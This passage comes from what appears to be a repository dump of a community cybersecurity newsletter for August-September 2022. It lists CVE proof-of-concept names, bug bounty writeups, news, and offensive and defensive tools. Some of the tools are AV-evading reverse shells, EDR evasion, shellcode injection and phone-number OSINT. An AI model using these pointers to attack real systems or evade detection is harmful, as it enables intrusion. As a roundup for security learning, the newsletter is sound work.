sanitizing user input right? Liran scarily points out that in fact although React does cover most cases for us, dynamic href attributes are not encoded so can be susceptible to XSS attacks 😱. It’s therefore important that if we are to expose some user input via href we should always prefix the protocol (https://) and use relative paths!\n\n---\n\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n#### Week -> [23rd - 30th August 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)\n\n**There are tens of thousands of vulnerabilities disclosed each year. Only a handful of them will ever be exploited So In this Section, Every Week we filter out [CVE poc exploit and analysis writeups that have Higher Severity](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).** If you don't play with CVE then please skip this Section.\n \n CVE POC exploit : CVE-2022-32250, CVE-2022-37042, CVE-2022-38766, CVE-2022-23779, CVE-2022-32250-Linux-Kernel-LPE, \n CVE-2022-22715 , CVE-2022-37153, CVE-2022-2884, CVE-2022-2586 and CVE-2022-LPE-UAF.\n \n CVE Analysis : CVE-2022-20233, Multiple CVE in TENDA, CVE-2022-24787, CVE-2022-33318, CVE-2022-2884, CVE-2022-26377, \n CVE-2020-2733 and CVE-2022-30129. \n \n### 🐞🐞🐞 BUG BOUNTY : report, vulnerability Writeups and resources 🐞🐞🐞\n\n *1. In This Segment, We have filtered out **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n \n - [$4000 Pause-based desync in Apache HTTP Server 2.4.52 and earlier (CVE-2022-22720)](https://hackerone.com/reports/1667974) fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling.\n - [Privilege Escalation - \"Analyst\" Role Can View Email Domains of a Company - [GET /voyager/api/voyagerOrganizationDashEmailDomainMappings]](https://hackerone.com/reports/1572591)\n \n *2. In This Segment We Collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES:** *\n \n - [$4,000 Command Injection in the GitHub Pages Build Pipeline](https://blog.nietaanraken.nl/posts/github-pages-command-injection/)\n - [Somdev Sangwan - Hacking ModSecurity leads to WAF bypass, Code injection and RCE](https://s0md3v.github.io/blog/modsecurity-rce-bypass)\n - [€1500 - Break the Logic: 5 Different Perspectives in Single Page](https://infosecwriteups.com/break-the-logic-5-different-perspectives-in-single-page-1500-5aa09da0fe7a)\n - [rez0 reference for why IDORs with unpredictable IDs are valid vulnerabilities](https://rez0.blog/hacking/cybersecurity/2022/08/18/unpredictable-idors.html)\n - [Bypassing Amazon WAF to pop an alert()](https://infosecwriteups.com/bypassing-amazon-waf-to-pop-an-alert-4646ce35554e)\n - [Out-Of-Bond Remote code Execution(RCE) on De Nederlandsche Bank N.V. with burp-suite collaborator](https://infosecwriteups.com/out-of-bond-remote-code-execution-rce-on-de-nederlandsche-bank-n-v-with-burp-suite-collaborator-2ce50260e2e4)\n - [a simple IDOR + Authorization vulnerability](https://monish-basaniwal.medium.com/the-million-dollar-hack-8163892bfe2f) to expose thousands of Visa gift cards on a leading gift card company’s website + Bonus: Found a way to redeem them more than once.\n - [Bug Hunting Search Engine- A community curated resources for bug bounty hunting](https://bugbountyhunting.com)\n \n\n### 🥇🥈🥉 OUR 6 FAVORITE FROM INFOSEC : article, whitepaper & statistics report 🥇🥈🥉\n \n - [Google announces launching Google’s Open Source Software Vulnerability Rewards Program (OSS VRP) to reward discoveries of vulnerabilities in Google’s open source projects](https://security.googleblog.com/2023/08/Announcing-Googles-Open-Source-Software-Vulnerability-Rewards-Program%20.html?m=1). As the maintainer of major projects such as Golang, Angular, and Fuchsia, Google is among the largest contributors and users of open source in the world. With the addition of Google’s OSS VRP to our family of Vulnerability Reward Programs (VRPs), researchers can now be rewarded for finding bugs that could potentially impact the entire open source ecosystem.\n - [API vulnerabilities discovered and exploited in Q1-2022](https://drive.google.com/file/d/1MuOdfTDC6VRbNKnvHS1jYeOHfoEOi_Ci/view?usp=sharing)\n - [Twitter Whistleblower Document Archive](https://archive.org/download/whistleblower_disclosure)\n - [$100,000 Attacking the Mozilla Firefox Renderer : Browser bug, RCE (Part 2)](https://www.zerodayinitiative.com/blog/2022/8/23/but-you-told-me-you-were-safe-attacking-the-mozilla-firefox-renderer-part-2)\n - [Cujanovic : SSRF (Server Side Request Forgery) testing resources](https://github.com/cujanovic/SSRF-Testing)\n - [Eavesdropping: €8,000,000 does it cost to buy Predator spyware ?](https://www.secnews.gr/417192/ipoklopes-agora-predator-spyware/)\n---\n### 🐦🐦🐦 TWITTER THREAD & TIPS 🐦🐦🐦\n \n - [Detectify shared a thread for Latest CVE submission on their Attack surface platform](https://twitter.com/detectify/status/1564285800086380545?t=V8lXKxykl1rrRZ0gNwBv_A&s=19).\n - [Rapid Api shared a thread on what exactly is CORS?](https://twitter.com/Rapid_API/status/1564621466620018690?t=5acaUewayJaLGyG_7R8fPw&s=19)\n - [Backdoor password in a ZIP!](https://twitter.com/_mohemiv/status/1561044393880178689) \n \n 🔴If you create a compressed file with the following command: 7z a x.zip 1.png -mem=AES256 -p\n Next, enter the following password (the password will not be shown):\n Nev1r-G0nna-G2ve-Y8u-Up-N5v1r-G1nna-Let-Y4u-D1wn-N8v4r-G5nna-D0sert-You\n\n Now decompress the file with the following command and password:\n 7z e x.zip\n\n and the following password:\n pkH8a0AqNbHcdw8GrmSp\n ---\n\n### 🔍🔍🔍 RESEARCHERS, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n **This is one the best Segment If you are a Researcher and want to explore Security, new approach to find vulnerabilty and Infosec Business in depth.** If you're a beginner bug Hunter or junior pentester. you can skip this Section.\n \n - **1 - Web Security, cloud misconfiguration and android security**\n - [API test environment](https://www.getsecureworld.com/blog/what-are-the-api-pentest-requirements/) This interesting article have a questions to perform the API pentesting.\n \n - In This Article, Nozero shared a story where What at first appeared to be minor “password issues” led to a high-risk attack path enabling NodeZero to [access the domain admin accounts, and even break into the organization’s Azure cloud environment](https://www.horizon3.ai/how-nodezero-found-access-to-azure-environment/).\n \n - [Misconfigured Resource-Based Policies - Hacking The Cloud](https://hackingthe.cloud/aws/exploitation/misconfigured_resource-based_policies/)\n \n - [Android security checklist - Theft of arbitrary files](https://blog.oversecured.com/Android-security-checklist-theft-of-arbitrary-files/)\n \n - [cezary-sec/awesome-browser-security](https://github.com/cezary-sec/awesome-browser-security/) \nA curated list of awesome browser security learning material by Opera’s Cezary Cerekwicki. Covers good intro material, security challenges and corresponding mitigations, attacks on browsers, and more.\n\n - [CSRF Vulnerability In The NodeJS 3rd party popular csurf package](https://fortbridge.co.uk/research/a-csrf-vulnerability-in-the-popular-csurf-package/)\n \n - [Chaining Telegram bugs to steal session-related files](https://dphoeniixx.medium.com/chaining-telegram-bugs-to-steal-session-related-files-c90eac4749bd)\n \n- **2 - Blue/Red/Purple/Threat hunting Team**\n - [Threat Hunting Tools: Our Recommendations](https://socprime.com/blog/threat-hunting-tools-our-recommendations/)\n \n - [Endpoint Security: Intuition around the Mudge Disclosures](https://medium.com/starting-up-security/endpoint-security-intuition-around-the-mudge-disclosures-dfbe014790f2) \nGreat post by Ryan McGeehan on the core things you should keep in mind about endpoint security, communicating with senior management, risk scenarios, measuring progress, practical realities, and more.\n \n - [BlueHound: Community Driven Resilience](https://zeronetworks.com/blog/bluehound-community-driven-resilience/)\nZero Networks’s Dekel Paz describes BlueHound, a tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network.\n \n - Hunting for emerging Sliver command-and-control(C2C) frameworks](https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/)\n \n - [Guide to DLL Sideloading](https://crypt0ace.github.io/posts/DLL-Sideloading/) \nDLL Sideloading is a technique related to DLL Hijacking.\n\n - [Hacking WatchGuard firewalls with vulnerability XPath injection, Memory corruption bug, Local Privilege Escalation and RCE](https://www.ambionics.io/blog/hacking-watchguard-firewalls). This article provide you depth on how ambionics Security discover 5 vulnerabilities - 2 patched along the way - and build 8 distinct exploits, and finally obtain an unpatched pre-authentication remote root 0-day on every WatchGuard Firebox/XTM appliance.\n \n - [How Hackers Exploit Exposed Default Welcome Page](https://blog.criminalip.io/2022/08/24/default-welcome-page-exposure/) By searching with the common keywords for Default Welcomoe Pages, can easily find exposed default welcome pages on the vulnerable open web.\n \n - [Investigating .NET CLR Usage Log Tampering Techniques For EDR Evasion (Part 2)](https://bohops.com/2022/08/22/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion-part-2/)\n\n - [On Cryptocurrency Wallet Design – defines access control taxonomy, can be reused e.g. for MFA factors](https://eprint.iacr.org/2021/1522.pdf)\n \n - **4 - Infosec Business** \n\n - In this Article, Haider Mahmood talked about [Information Security Checklist for Small to Medium Organizations](https://haiderm.com/information-security-checklist-for-small-to-medium-organizations/)\n\n - In this Article Author(nozaq) shared his expiriance in detailed and [The to-do list for terminating a payment service](https://engineering.mercari.com/en/blog/entry/20201219-6e7ea87db8/)\n\n - In this article, [Godric Cao share his expiriance when it comes to organizational design](https://engineering.mercari.com/en/blog/entry/20211225-size-backend-team-to-5-to-8-members/) and Factors such as the company’s current phase, efforts to adjust impacting team performance together with team sizes, organization and individual growth paths etc. \n\n---\n\n### 📰📰📰 NEWS 📰📰📰\n\n- **Leaks & BlackHat Hacker:**\n \n - [🟢Data-Leak:LastPass hacked and stolen source code, blueprints of company by intruder](https://www.theregister.com/2022/08/25/lastpass_security/) 🔴Hacking was done by hacking the account of a developer and through that hackers were able to penetrate the development environment inside the company.\n - [🟢Explained: The General Bytes Bitcoin ATM Hack (August 2022)](https://halborn.com/explained-the-general-bytes-bitcoin-atm-hack-august-2022/)\n - [🟢ÆPIC Leak: Architecturally Leaking Uninitialized Data from the Microarchitecture](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing)\n\n- **Top 5 Infosec News:**\n - [🟢 80,000 Hikvision cameras vulnerable with CVE-2021-36260](https://www.bleepingcomputer.com/news/security/over-80-000-exploitable-hikvision-cameras-exposed-online/) 🔴If you operate a Hikvision camera, you should make it a priority to install the latest available firmware update, use a strong password, and isolate the IoT network from critical assets using a firewall or VLAN.\n - [🟢 Ex-Twitter exec blows the whistle, alleging reckless and negligent cybersecurity policies](https://edition.cnn.com/2022/08/23/tech/twitter-whistleblower-peiter-zatko-security/index.html)🔴One of Twitter's former security chiefs named Peiter \"Mudge\" Zatko has revealed in disclosure about the security and privacy of this platform that include Twitter has major security problems that pose a threat to the personal information of its users, company shareholders, national security, and democracy.\n - [🟢Google Uncovers Tool Used by Iranian Hackers to Steal Data from Email Accounts](https://thehackernews.com/2022/08/google-uncovers-tool-used-by-iranian.html?fbclid=IwAR34LikXAB8_osmMVauu0jAZuDRPbGKkfQRG-fcc2lWnOXZLjO49y3kqmws)\n - [🟢NATO investigating hacker sale of missile firm data](https://www.bbc.co.uk/news/technology-62672184). 🔴Nato says it's assessing the impact of a breach of classified military documents being sold by a hacker group online but the source of the documents is murky.\n - [🟢DuckDuckGo opens its privacy-focused email service to everyone](https://www.bleepingcomputer.com/news/security/duckduckgo-opens-its-privacy-focused-email-service-to-everyone/).\n---\n\n### 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ \n\n*Community test the Tools and we filter out most demanding and helpful tools that suis the hacker Purpose.*\n\n - **1. SAAS/PASS/Recon/Network/Web Pentesting** - 8\n \n - [JWT-Reauth - a plugin aims to provide a painless solution to this issue](https://research.nccgroup.com/2022/08/25/tool-release-jwt-reauth/). JWT-Reauth provides Burp with a way to authenticate with a given endpoint, parse out the provided token and then attach it as a header on requests going to a given scope. \n \n - [tfsec](https://github.com/aquasecurity/tfsec) -> This Community-driven tool got the popularity for useing static analysis of your terraform code to spot potential misconfigurations across all major cloud provides.\n \n - [hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons)-> By Hahwul: A collection of cool tools used by web hackers, grouped by tag and language. Types: Swiss Army Knife, recon, fuzzer, scanner, exploit, utils, etc.\n \n - [Vision2 - Nmap's XML result parse and NVD's CPE correlation to search CVE](https://github.com/CoolerVoid/Vision2)\n \n - [Renko](https://github.com/pablosnt/rekono) -> This Tool got the popularity for combines other hacking tools and its results to execute complete pentesting processes against a target in an automated way. The findings obtained during the executions will be sent to the user via email or Telegram notifications and also can be imported in Defect-Dojo if an advanced vulnerability management is needed. \n \n - [Jscythe](https://github.com/evilsocket/jscythe) -> Abuse the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code. \n \n - [EtwSessionHijacking](https://github.com/ORCx41/EtwSessionHijacking) -> A Poc on blocking Procmon from monitoring network events.\n \n - [ExchangeFinder](https://github.com/mhaskar/ExchangeFinder) -> Find Microsoft Exchange instance for a given domain and identify the exact version.\n \n - **2. Cloud Security** - 1\n \n - [How to detect suspicious activity in your AWS account by using private decoy resources](https://aws.amazon.com/blogs/security/how-to-detect-suspicious-activity-in-your-aws-account-by-using-private-decoy-resources/) -> AWS’s Maitreya Ranganath and Mark Keating describe how you can create low-cost private decoy AWS resources in your AWS accounts and configure them to generate alerts when they are accessed. See also the awesome [canarytokens.org}(https://canarytokens.org/generate)\n \n - **3. Blue/Red Team, IR and Threat intelligence Tools** - 4\n \n - [RedCloud - Comfy & powerful #RedTeam Infrastructure deployment using #Docker](https://github.com/khast3x/Redcloud). -> It has gain his popularity in Redteam Community because It Harness the cloud's speed for your tools(Metasploit, Empire, GoPhish, vulnerable targets, a fully stacked Kali, and many more). Deploys in minutes. Use and manage it with its polished web interface.\n \n - [Deobfuscate Log4Shell payloads with ease](https://github.com/ox-eye/Ox4Shell) .\n -> Since the release of Log4Shell, many tools were created to obfuscate Log4Shell payloads. This #Blue Team purpose tool by Oxeye lets you unravel the true contents of obfuscated Log4Shell payloads with ease.\n \n - [hoaxshell](https://github.com/t3l3machus/hoaxshell)An unconventional Windows reverse shell, currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic. \n \n - [Yarang - YARA New Generation](https://github.com/avast/yarang) -> yarang is an experiment focused on new scanning engine for YARA, which is based on compiling YARA ruleset into native code and exposing C API in order to use it anywhere. It uses HyperScan under the hood as a pattern matcher instead of custom Aho-Corasick implementation which YARA rolls.\n \n - **4. OSINT Tools** - 3\n \n - [Geogramint](https://github.com/Alb-310/Geogramint) -> An OSINT Geolocalization tool for Telegram that find nearby users and groups. \n \n - [Moriarty-Project](https://github.com/AzizKpln/Moriarty-Project) -> This tool gives information about the phone number that you entered.\n \n - [fake-sms](https://github.com/machine1337/fake-sms) -> Feature that make this tools interesting include sms anonymously, easy & super fast sms sending, international sms sending available, no charges on sending sms but we have 1 limitation as well you can send only one sms per day. \n \n - **5. IoT, OS & Hardware** - 2 \n \n - [Titan M tools](https://github.com/quarkslab/titanm) -> Attack on Google Titan M, Reloaded: Vulnerability Research on a Modern Security Chip\n \n - [Tangled WinExec](https://github.com/daem0nc0re/TangledWinExec) -> This repository is for investigation of Windows process execution techniques. Most of PoCs are given a name corresponding to the technique.\n\n---\n \n### 🤝🤝🤝 How to get involve in Contribution. #Contact-Us 🤝🤝🤝\n\n

\n \n
\n\n If you quickly want to get involved in making **Weekly Cybersecurity Update** a better, but aren't sure how.\n CONTACT \"@Attr1b\" on Telegram or mail us to \"resethackerofficial@gmail.com\" \n \n Please write a reason, How do you plan to improve it?\n \n### I'm so grateful to all the [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) without their Writeups, article, findings and whitepaper [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) would not have been possible.\n\n### I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementSupport.md). Without their support reaching \"Weekly InfoSec Update\" to hacker would not have been possible.\n\n### Wrapping Up\n\n Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you.\n\n If you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏\n\n Thanks for reading!\n" }, { "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_05.md", "content": " #### Hey Hackers, I hope you’ve been doing well on weekend! \n Here are the Agenda for \"Weekly infosec Update\" v0.4 (31th Aug 2022 - 6th September 2022) \n \n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n

\"Pentesting-Bugbounty//ResetCybersecuirty/\"

\n\n![WIU Agenda 969 540](https://user-images.githubusercontent.com/25515871/189000793-96e05f82-f44f-4d64-8e2f-316181a9b3ae.jpg)\n\nHuge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\nContributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n\n---\n### Let's start the EVENT recap, and my apology for So much Info. We're finding a way to make it shorter.\n\n**This Week Defcon, BlackHat and RECAP of RSA Conference 2022 was mainly trending in infosec community so We have filtered important Talk, Slides, Tools, Weekly Podcast, Youtube Videos and resources releted to Events, Talks & Webinars for Community.**\n\n - This week [Blackhat 2022 all the slides](https://drive.google.com/drive/mobile/folders/1KHx2rKUEdb53flGUN0mFHRdSdB5PUT4B?fbclid=IwAR1C2Fk3XDPU-ky-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVdrive.google.com/drive/u/0/folders/1-pLHmmyU0GvonWAtL1os2NTmkJLcM4UT) was still trending in the community. Enjoy :)\n\n- In case you have missed the [\"RSA Conference 2022\"](https://www.linkedin.com/pulse/momentum-cyber-rsa-conference-2022-recap-dino-boukouris/?trackingId=GD4%2Bt20hQSe7k%2BS6TrxVZg%3D%3D). dino-boukouris wrote an Recap.\n\n - @KathanP19 had the opportunity to [interview @devl00p](https://www.youtube.com/watch?v=X72_YzOAc5M&feature=youtu.be) the #1 Hacker on the @openbugbounty Platform, who has helped fix over 85k bugs.\n\n- Some beleive that Hacker are more than using computer to Manupulating victim computer so this video for them that Uncovering government agencies (especially the CIA) that secretly tested the effects of LSD on humans. [**Mission Mind Control (1979)**](https://www.youtube.com/watch?v=DMH5WgGFxlc): National Archives and Records Administration - ARC Identifier 37950 / Local Identifier 170.110 - Mission Mind Control - Department of Justice. Drug Enforcement Administration. (07/01/1973 - ).\n\n- Upcomming 𝙀𝙑𝙀𝙉𝙏𝙎: *Sans Blockchain Security Summit* - Rockville - 31st August, *LogRhythm RhythmWorld 2022* - Denver - 13th-15th September and *SSP Alert Live Washington DC*- 19th-21st September.\n---\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n#### Week -> [31st August - 06 September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)\n\n**There are tens of thousands of vulnerabilities disclosed each year. Only a handful of them will ever be exploited So In this Section, Every Week we filter out [CVE poc exploit and analysis writeups that have Higher Severity](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).** If you don't play with CVE then please skip this Section.\n \n CVE POC exploit : CVE-2022-1388, CVE-2022-32250 and CVE-2022-2639.\n \n CVE Analysis : CVE-2022-30592, CVE-2021-38297, CVE-2022-31814. CVE-2022-21371, CVE-2022-24637, CVE-2022-33174, CVE-2022-1802, \n CVE-2022-23779, CVE-2022-24637, CVE-2022-35406 and Week#35 of Advisory Week Newsletter.\n \n### 🐞🐞🐞 BUG BOUNTY : report, vulnerability Writeups and resources 🐞🐞🐞\n\n *1. In This Segment, We have filtered out **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n \n - [$4000 Pause-based desync in Apache HTTP Server 2.4.52 and earlier (CVE-2022-22720)](https://hackerone.com/reports/1667974) fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling.\n \n - [Privilege Escalation - \"Analyst\" Role Can View Email Domains of a Company - [GET /voyager/api/voyagerOrganizationDashEmailDomainMappings]](https://hackerone.com/reports/1572591)\n \n *2. In This Segment We Collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES***\n \n - $4,000 Command Injection in the [GitHub Pages Build Pipeline](https://blog.nietaanraken.nl/posts/github-pages-command-injection/)\n - [$1,000 - Developer dumb Mistake lead to Information Disclosure](https://mr23r0.medium.com/the-database-handover-a-dumb-mistake-critical-bug-f73c99e72e40)\n - [Snap_sec found Log4Shell and RCE on Agorapulse](https://snapsec.co/blog/Log4shell-on-agorapulse/)\n - [How I \"Hacked\" an Airline Website to get back my luggage: A first-person insight to the story.](https://blog.nandankumar.info/how-i-hacked-an-airline-website-to-get-back-my-luggage-a-first-person-insight-to-the-story)\n - Microsoft researchers discovered a high-severity flaw [(CVE-2022-28799) in the TikTok Android app, which could have allowed attackers to hijack users’ accounts with a single click ](https://www.microsoft.com/security/blog/2022/08/31/vulnerability-in-tiktok-android-app-could-lead-to-one-click-account-hijacking/) -> In short the exploit utilized JavaScript bridging in order to bypass deeplink verification for specifically the Android version of the social network's app.\n - YesWeHack blog released [a full and detailed comparison of subdomain enumeration tools](https://blog.yeswehack.com/yeswerhackers/subdomains-tools-review-full-detailed-comparison/)\n \n---\n\n### 🔍🔍🔍 RESEARCHERS, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n **This is one the best Segment If you are a Researcher, founders, organization and want to explore Security, new approach to find vulnerabilty and Infosec Business in depth.** If you're a beginner bug Hunter or junior pentester. you can skip this Section.\n \n - **1 - Web Security and android security**\n - Thick Client Pentest: [Modern Approaches and Techniques: PART 1](https://infosecwriteups.com/thick-client-pentest-modern-approaches-and-techniques-part-1-7bb0f5f28e8e)\n - [Linux Audit comes at a cost, is that where BPF steps in?](https://goteleport.com/blog/linux-audit/)\n - Hashar Mujahid explain [how OAuth 2.0 works and what vulnerabilities can be raised if it is implemented incorrectly. PART1](https://infosecwriteups.com/oauth-2-0-introduction-and-exploitation-part-i-explained-by-hashar-mujahid-262f9c59de6c)\n - Hashar Mujahid [show some techniques that can be used to exploit OAuth 2.0 and possibly allow an attacker to take over the victim's account completely.](https://infosecwriteups.com/exploiting-oauth-authentication-vulnerabilities-part-ii-6c150f492e62)\n - [Practical guide for Golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)\n - [What Is a Random Number Generator Attack?](https://halborn.com/what-is-a-random-number-generator-attack/)\n - whiteoaksecurity released a blog on [Exploiting GraphQL Batching Attacks Using Turbo Intruder](https://www.whiteoaksecurity.com/blog/graphql-batching-attacks-turbo-intruder/)\n - daniel.haxx released a blog on [curl’s TLS fingerprint](https://daniel.haxx.se/blog/2022/09/02/curls-tls-fingerprint/)\n - Cloudflare released a blog on [Blocking Kiwifarms](https://blog.cloudflare.com/kiwifarms-blocked/)\n \n \n - **2 - Cloud Security**\n\n - [How BYOD Could Be Putting Your Company’s Security at Risk](https://ipwithease.com/byod-security-at-risk/) \n - [From Onboarding to Offboarding - Securing GitHub Apps Integration](https://www.cidersecurity.io/blog/research/from-onboarding-to-offboarding-securing-github-apps-integration/)\n - [Open source automated AWS CIS v1.5 benchmark assessment just released by Steampipe.io](https://hub.steampipe.io/mods/turbot/aws_compliance/controls/benchmark.cis_v150)\n - [Misconfigured Resource-Based Policies - Hacking The Cloud](https://hackingthe.cloud/aws/exploitation/misconfigured_resource-based_policies/)\n - [OWASP Kubernetes Top Ten](https://owasp.org/www-project-kubernetes-top-ten/)\n - [How to centralize findings and automate deletion for unused IAM roles [AWS]](https://aws.amazon.com/blogs/security/how-to-centralize-findings-and-automate-deletion-for-unused-iam-roles/)\n \n- **3 - Blue/Red/Purple/Threat hunting Team**\n - Blue Team\n - Strategy of Security Team have [analyzing the themes and impact of security incidents and breaches from Verizon's 2022 Data Breach Investigations Report.](https://strategyofsecurity.com/the-strategic-impact-of-verizons-2022-data-breach-investigations-report/)\n - [Sleeping With Control Flow Guard](https://icebreaker.team/blogs/sleeping-with-control-flow-guard/) -> Disabling CFG allows an attacker to use sleep obfuscation techniques to evade detection. Additionally, we walk through the basics of reverse engineering an undocumented struct.\n - Dirk-jan Mollema discussed an issue he discovered that enabled the use of [SMTP matching (also called soft matching) to synchronize Active Directory (AD) users to Azure AD,](https://www.semperis.com/blog/smtp-matching-abuse-in-azure-ad/) with the goal of hijacking unsynchronized accounts. \n \n - [Creating a Threat Hunting Lab for Free with Graylog](https://www.linkedin.com/pulse/creating-threat-hunting-lab-free-graylog-david-elgut)\n - [APT-C-08 (Manlinghua) latest remote control component wmRAT analysis briefing](https://mp-weixin-qq-com.translate.goog/s/IZNl6N2K1LUU7e1hT4JeYw?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)\n - [NSA, CISA, ODNI Release Software Supply Chain Guidance for Developers](https://media.defense.gov/2022/Sep/01/2003068942/-1/-1/0/ESF_SECURING_THE_SOFTWARE_SUPPLY_CHAIN_DEVELOPERS.PDF)\n - [Defending the expanding Attack surface by TrenMicro](https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/defending-the-expanding-attack-surface-trend-micro-2022-midyear-cybersecurity-report)\n - [Towards a Tectonic Traffic Shift? Investigating Apple’s New Relay Network](https://drive.google.com/file/d/1aHE7CIEaCI59KLKQlxlkP_BmElAccgyf/view?usp=sharing)\n - [Reviewing macOS Unified Logs](https://www.mandiant.com/resources/blog/reviewing-macos-unified-logs)\n \n - Red Team\n - [Win32 and Kernel abusing techniques for pentesters & red-teamers](https://github.com/matthieu-hackwitharts/Win32_Offensive_Cheatsheet) \n - [WinAPI and P/Invoke in C#](https://crypt0ace.github.io/posts/WinAPI-and-PInvoke-in-CSharp/) In this blog post @AhmedSher have covered basics of using our managed code so we can run Windows API calls. But we should first know what managed and unmanaged code means.\n - [Windows Privilege Escalation (3) — Hack Windows through Weak Service Permissions](https://medium.com/@tinopreter/windows-privilege-escalation-3-weak-service-permissions-45a39a64669f) This is part 3 of @ClementTino - Windows PrivEsc series where in part one he about Unquoted Service Paths and the second which is about Hijacking DLLs.\n \n - [Exploiting GraphQL Batching Attacks Using Turbo Intruder](https://www.whiteoaksecurity.com/blog/graphql-batching-attacks-turbo-intruder/)\n - [Shellcode Injection Techniques in C#](https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques/) In this blog post @AhmedSher have discussed about Process Injection in C#.\n\n\n - **4 - Infosec Business, funded and Market** \n\n - As a Hacker turn Enterprenur. I would like to recommend CYBER SECURITY MARKET reseach paper by [Strategic Market Research LLP.](https://www.globenewswire.com/news-release/2022/08/25/2504919/0/en/With-9-51-CAGR-Global-Cyber-Security-Market-Size-to-Reach-USD-8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA.7B by 2030.\n \n - [Darkreading has wrote an summery for MarketsandMarkets(TM) Report](https://www.darkreading.com/vulnerabilities-threats/penetration-testing-market-worth-2-7b-by-2027-marketsandmarkets-tm-report) that highlight Penetration Testing Market Worth $2.7B By 2027 and more.\n \n - [Cyber Security Insurance Market May See a Big Move](https://insurancenewsnet.com/oarticle/cyber-security-insurance-market-may-see-a-big-move-major-giants-axa-beazley-allianz-47)\n \n - The Security, Funded newsletter issue #58 by Return on Security shared the Funding Summary for August 22nd, 2022. Where he mentioned\n 9 companies raised $29.1M across 9 unique product categories and\n 3 companies were acquired or had a merger event across 3 unique product categories\n \n - @NonConformist Made Over [$253,584 From YouTube With A Faceless Channel. Here’s How](https://medium.com/@Non_Conformist/i-made-over-253-584-from-youtube-in-2-years-heres-how-60fd6dbf55af)\n---\n\n### 📰📰📰 NEWS 📰📰📰🟢\n- **TWITTER THREAD & TIPS**\n\n - 🟢 Ec-Council announce that [ew C|EH v12 features hands-on learning labs, cyber ranges, certification assessments, cyber competitions, and more new learning framework will be releasing on 7th Sept. 2022.](https://twitter.com/ECCOUNCIL/status/1566926251352154112?s=20&t=LyCqjfX8g0Vu3Fj-IFhRJg)\n \n - 🟢 @MeAsHacker_HNA shared the resources for [How to Get into Bugbounty?](https://twitter.com/MeAsHacker_HNA/status/1564872288981422083?t=pwpion7Ah8di1tdVfOuTzw&s=19)\n - 🟢 Bugbounty#Tips [How to find local file and read vulnerability based on cookies?](https://twitter.com/_bughunter/status/1566411555901784064?t=-92FYhv1aDIjwIgtP0vvcA&s=19)\n - 🟢 Nuclei: DhiyaneshDK have shared [15 new AEM template](https://twitter.com/DhiyaneshDK/status/1565785561222512641?s=20&t=CWlnoDG75W0swpGi48LsrQ)\n\n - 🟢 @malmoeb shares the thread on [Hunting - Turned on automatic logon in window.](https://twitter.com/malmoeb/status/1565066146881085442?t=EEhLRZDf4bfgKR3aRuiTGQ&s=19)\n - 🟢 [cyberboy shared a thread on [Blockchain & Smart contact security](https://twitter.com/cyberboyIndia/status/1564953200494489600?t=q-bqvv2exElzPTsa7n1hQA&s=19)\n - 🟢 [MSSQL Coercer: Coerce a Windows SQL Server to authenticate on an arbitrary 